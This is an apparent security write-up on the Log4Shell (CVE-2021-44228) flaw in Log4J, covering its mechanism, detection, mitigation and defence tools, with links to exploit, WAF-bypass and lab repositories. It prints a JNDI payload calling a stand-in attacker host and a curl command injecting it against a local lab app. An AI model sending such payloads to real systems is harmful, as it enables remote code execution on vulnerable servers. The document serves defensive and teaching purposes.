[AppSec] Log4Shell (CVE-2021–44228)

Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

What is Log4J?

Log4J (or Log4J version 2) is an open source Java Library and one of the most popular Java logging frameworks. All versions of log4j-core from 2.0-beta9 to 2.14.1 are vulnerable to this vulnerability (CVE-2021–44228).

Why is it critical?

An attacker could gain unauthenticated Remote Code Execution (RCE) by exploiting this vulnerability. Also, payloads can be delivered in many different ways such as HTTP requests, user-controlled fields, SMS message, email, change of computer name and more. Finally, due to the popularity of the Log4J, a lot of companies are vulnerable to this vulnerability.

What is the vulnerability?

The vulnerable version of the Log4J server will log a payload (e.g., ${jndi:ldap://<ATTACKER IP>/a}) sent by an attacker. This can trigger the vulnerability to make the server a request to the attacker’s control server to execute the second stage payload (e.g., exploit.class) via JNDI (Java Naming and Directory Interface) injection.

How to identify the vulnerability?

It can be as simple as trying to make an HTTP request to do a DNS lookup against the vulnerable server(s). One can use CanaryToken or Burp Collaborator to verify the DNS query.

How to mitigate?

• Upgrade the affected Log4J to the patched version of 2.16.0
• Limit the egress traffic where possible

Detecting PoC:

• BurpLog4jScan — https://github.com/tangxiaofeng7/BurpLog4j2Scan
• log4j-detect — https://github.com/takito1812/log4j-detect
• Online Tester — https://log4j-tester.trendmicro.com/

Exploit PoC:

• https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

RCE Payload PoC:

• https://github.com/mbechler/marshalsec

Log4Shell WAF Bypass:

• https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

Labs / Vulnerable App:

• https://github.com/christophetd/log4shell-vulnerable-app

# Running the server
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
# Exploit
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'

Defense:

• Logout4Shell — https://github.com/Cybereason/Logout4Shell
• Log4jHotPatch — https://github.com/corretto/hotpatch-for-apache-log4j2
• Log4Shell IOCs — Link

Further Read Links:

• https://www.royvanrijn.com/blog/2021/12/log4j2-rce-problem/
• https://www.lunasec.io/docs/blog/log4j-zero-day/
• https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/
• https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
• https://www.randori.com/blog/cve-2021-44228/
• https://www.randori.com/log4j/
• https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html
• https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/